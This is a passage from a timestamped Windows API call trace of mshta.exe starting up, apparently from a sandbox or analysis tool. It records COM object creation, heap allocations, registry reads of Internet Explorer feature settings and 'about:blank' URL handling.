Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x750296d4 | out: ppv=0x750296d4*=0x442fc8) returned 0x0 [0065.670] DllGetClassObject (in: rclsid=0x441240*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ced44 | out: ppv=0x2ced44*=0x75028cb0) returned 0x0 [0065.671] IClassFactory:CreateInstance (in: This=0x75028cb0, pUnkOuter=0x0, riid=0x2cf6f0*(Data1=0x0, 
Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ced30 | out: ppvObject=0x2ced30*=0x442fc8) returned 0x0 [0065.671] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2a8) returned 0x442b48 [0065.775] GetCurrentThreadId () returned 0x90 [0065.885] RegisterClassExW (param_1=0x2cebdc) returned 0xc16a [0065.886] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74af0000, lpParam=0x0) returned 0x202ae [0065.886] GetWindowLongW (hWnd=0x202ae, nIndex=-20) returned 0 [0065.886] NtdllDefWindowProc_W () returned 0x1 [0065.886] NtdllDefWindowProc_W () returned 0x0 [0065.886] NtdllDefWindowProc_W () returned 0x0 [0065.886] NtdllDefWindowProc_W () returned 0x0 [0065.887] NtdllDefWindowProc_W () returned 0x0 [0065.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f830 [0065.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f848 [0065.887] CreateCompatibleDC (hdc=0x0) returned 0x100109d1 [0065.887] GetDeviceCaps (hdc=0x100109d1, index=90) returned 96 [0065.887] GetDeviceCaps (hdc=0x100109d1, index=88) returned 96 [0065.887] GetSystemMetrics (nIndex=68) returned 4 [0065.887] GetSystemMetrics (nIndex=69) returned 4 [0065.887] GetSystemMetrics (nIndex=2) returned 17 [0065.887] GetSystemMetrics (nIndex=3) returned 17 [0065.887] GetStockObject (i=13) returned 0x18a002e [0065.887] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x18a002e [0065.887] GetTextMetricsW (in: hdc=0x100109d1, lptm=0x2cec74 | out: lptm=0x2cec74) returned 1 [0065.888] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x18a002e [0065.888] DeleteObject (ho=0x18a002e) returned 1 [0065.888] GetSystemDefaultLCID () returned 0x409 [0065.888] GetUserDefaultLCID () returned 0x409 [0065.888] GetACP () returned 0x4e4 [0065.888] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, 
lpLCData=0x2cebe8, cchData=41 | out: lpLCData="1") returned 2 [0065.888] _wtoi (_String="1") returned 1 [0065.888] RegCloseKey (hKey=0x0) returned 0x6 [0065.888] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x2cec3c, cchData=16 | out: lpLCData="0123456789") returned 11 [0065.888] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7502b038, fWinIni=0x0 | out: pvParam=0x7502b038) returned 1 [0065.888] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x2cecb0, fWinIni=0x0 | out: pvParam=0x2cecb0) returned 1 [0065.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x442f00 [0065.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f860 [0065.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa4) returned 0x43e3c8 [0065.889] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4334b8 [0065.889] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x43abd0 [0065.889] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4291d0 [0065.889] GetSystemWindowsDirectoryW (in: lpBuffer=0x2ceabc, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0065.889] lstrlenW (lpString="C:\\Windows") returned 10 [0065.889] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0065.889] CreateActCtxW (pActCtx=0x2cea98) returned 0x43e47c [0065.891] ActivateActCtx (in: hActCtx=0x43e47c, lpCookie=0x2cea68 | out: hActCtx=0x43e47c, lpCookie=0x2cea68) returned 1 [0065.891] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x754a0000 [0065.989] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1fad0001) returned 1 [0065.989] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0065.990] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0065.990] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0065.990] GetProfileIntA 
(lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0065.990] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ce6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.991] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ce8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.991] GetCurrentProcess () returned 0xffffffff [0065.991] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x2cead8, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0065.991] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4334d8 [0065.991] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0065.991] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x2ce6b4, pvData=0x2ce6c0, pcbData=0x2ce6bc*=0x4 | out: pdwType=0x2ce6b4*=0x0, pvData=0x2ce6c0, pcbData=0x2ce6bc*=0x4) returned 0x2 [0065.992] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce62c | out: phkResult=0x2ce62c*=0x154) returned 0x0 [0065.992] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce630 | out: phkResult=0x2ce630*=0x150) returned 0x0 [0065.992] RegOpenKeyExW (in: hKey=0x150, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce5ec | out: phkResult=0x2ce5ec*=0x0) returned 0x2 [0065.992] RegOpenKeyExW (in: hKey=0x154, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce5ec | out: 
phkResult=0x2ce5ec*=0x0) returned 0x2 [0065.992] RegCloseKey (hKey=0x0) returned 0x6 [0065.992] RegCloseKey (hKey=0x0) returned 0x6 [0065.992] RegCloseKey (hKey=0x154) returned 0x0 [0065.992] RegCloseKey (hKey=0x150) returned 0x0 [0065.992] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x97c) returned 0x442fc8 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x480) returned 0x443950 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x43ee00 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x43ee58 [0065.993] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x43f280 [0065.994] GetCurrentThreadId () returned 0x90 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f920 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2c) returned 0x42d808 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x43f2d8 [0065.994] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc169 [0065.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x4334f8 [0065.994] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0065.995] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x75028cd4, dwReserved=0x0 | out: ppSM=0x75028cd4*=0x43f360) returned 0x0 [0066.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x64) returned 0x444218 [0066.071] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x43f3c8 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) 
returned 0x42d120 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433518 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429220 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429270 [0066.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x444288 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64) returned 0x4442f0 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4292c0 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x444360 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x444620 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429310 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429360 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4293b0 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4443c8 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x444718 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429400 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x429450 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x444780 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x140) returned 0x444818 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x43ba20 [0066.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x42d150 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x433538 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xd0) returned 0x43c4d0 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x38) returned 0x43eeb0 [0066.074] 
RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x444960 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x148) returned 0x444a90 [0066.074] GetCurrentThreadId () returned 0x90 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5c) returned 0x444be0 [0066.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x433558 [0066.074] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2ce9dc | out: ppURI=0x2ce9dc*=0x43bc54) returned 0x0 [0066.075] IUri:GetPropertyDWORD (in: This=0x43bc54, uriProp=0x11, pdwProperty=0x2ce9c4, dwFlags=0x0 | out: pdwProperty=0x2ce9c4*=0x11) returned 0x0 [0066.075] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x4436fc, dwReserved=0x0 | out: ppSM=0x4436fc*=0x444c48) returned 0x0 [0066.076] IInternetSecurityManager:SetSecuritySite (This=0x444c48, pSite=0x443704) returned 0x0 [0066.076] IUnknown:AddRef (This=0x443704) returned 0x28 [0066.076] IUnknown:QueryInterface (in: This=0x443704, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2ce994 | out: ppvObject=0x2ce994*=0x443708) returned 0x0 [0066.076] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x444c70 | out: ppvObject=0x444c70*=0x0) returned 0x80004002 [0066.076] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, 
[2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x444c6c | out: ppvObject=0x444c6c*=0x0) returned 0x80004002 [0066.076] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x444c68 | out: ppvObject=0x444c68*=0x0) returned 0x80004002 [0066.076] IUnknown:Release (This=0x443708) returned 0x0 [0066.076] IInternetSecurityManager:GetSecurityId (in: This=0x444c48, pwszUrl="about:blank", pbSecurityId=0x2cea30, pcbSecurityId=0x2cea24*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cea30*=0x61, pcbSecurityId=0x2cea24*=0xf) returned 0x0 [0066.183] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x2cdfb0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cd668 | out: ppv=0x2cd668*=0x75028c70) returned 0x0 [0066.184] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.184] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.184] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ce22c | out: ppvObject=0x2ce22c*=0x75028c70) returned 0x0 [0066.184] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.184] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3ec | out: ppvObject=0x2ce3ec*=0x75028c7c) returned 0x0 [0066.184] IUnknown:Release (This=0x75028c70) 
returned 0x1 [0066.184] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce434, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x2ce434*=0xc) returned 0x0 [0066.184] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445880 [0066.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445880 | out: hHeap=0x410000) returned 1 [0066.184] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.185] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce300 | out: ppv=0x2ce300*=0x75028c70) returned 0x0 [0066.185] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3ec | out: ppvObject=0x2ce3ec*=0x75028c7c) returned 0x0 [0066.185] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.185] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce444, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2ce444*=0x0) returned 0x800c0011 [0066.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.185] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.186] IUnknown:Release (This=0x43bc54) returned 0x2 [0066.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf) returned 0x43f968 
[0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f998 [0066.186] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x2cea04, dwReserved=0x0 | out: ppSM=0x2cea04*=0x446e80) returned 0x0 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf) returned 0x43f9e0 [0066.186] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x446dc8 [0066.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cebb4 | out: phkResult=0x2cebb4*=0x198) returned 0x0 [0066.187] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cebb8 | out: phkResult=0x2cebb8*=0x1a4) returned 0x0 [0066.187] RegOpenKeyExW (in: hKey=0x1a4, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x2ceb74 | out: phkResult=0x2ceb74*=0x0) returned 0x2 [0066.187] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x2ceb74 | out: phkResult=0x2ceb74*=0x0) returned 0x2 [0066.187] RegCloseKey (hKey=0x0) returned 0x6 [0066.187] RegCloseKey (hKey=0x0) returned 0x6 [0066.187] RegCloseKey (hKey=0x198) returned 0x0 [0066.187] RegCloseKey (hKey=0x1a4) returned 0x0 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x44a610 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44a740 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa10 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2000) returned 0x44a798 [0066.188] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44c7a0 [0066.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c7a0 | out: hHeap=0x410000) returned 1 [0066.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 
lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.188] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2ce9f8 | out: ppURI=0x2ce9f8*=0x43bc54) returned 0x0 [0066.189] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce2d0 | out: ppv=0x2ce2d0*=0x75028c70) returned 0x0 [0066.189] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3bc | out: ppvObject=0x2ce3bc*=0x75028c7c) returned 0x0 [0066.189] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.189] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce404, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x2ce404*=0xc) returned 0x0 [0066.189] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445880 [0066.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445880 | out: hHeap=0x410000) returned 1 [0066.189] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.190] DllGetClassObject (in: rclsid=0x441274*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce2d0 | out: ppv=0x2ce2d0*=0x75028c70) returned 0x0 [0066.190] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, 
Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3bc | out: ppvObject=0x2ce3bc*=0x75028c7c) returned 0x0 [0066.190] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.190] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x433618, cchResult=0xc, pcchResult=0x2ce414, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2ce414*=0x0) returned 0x800c0011 [0066.190] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.190] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.190] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.190] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.190] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.191] IUnknown:Release (This=0x43bc54) returned 0x2 [0066.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2c) returned 0x42d840 [0066.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4248a0 [0066.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5c) returned 0x44c7a0 [0066.192] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.192] GetDeviceCaps (hdc=0x1b0101ce, index=88) returned 96 [0066.192] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.192] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0066.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec50 | out: phkResult=0x2cec50*=0x130) returned 0x0 [0066.193] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec54 | out: phkResult=0x2cec54*=0x198) returned 0x0 [0066.193] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", 
ulOptions=0x0, samDesired=0x1, phkResult=0x2cec10 | out: phkResult=0x2cec10*=0x0) returned 0x2 [0066.193] RegOpenKeyExW (in: hKey=0x130, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2cec10 | out: phkResult=0x2cec10*=0x0) returned 0x2 [0066.193] RegCloseKey (hKey=0x0) returned 0x6 [0066.193] RegCloseKey (hKey=0x0) returned 0x6 [0066.193] RegCloseKey (hKey=0x130) returned 0x0 [0066.193] RegCloseKey (hKey=0x198) returned 0x0 [0066.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x424ae0 [0066.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x44) returned 0x4294a0 [0066.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5c) returned 0x44c808 [0066.194] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0066.194] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0066.194] RtlInitializeConditionVariable () returned 0x44c83c [0066.194] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 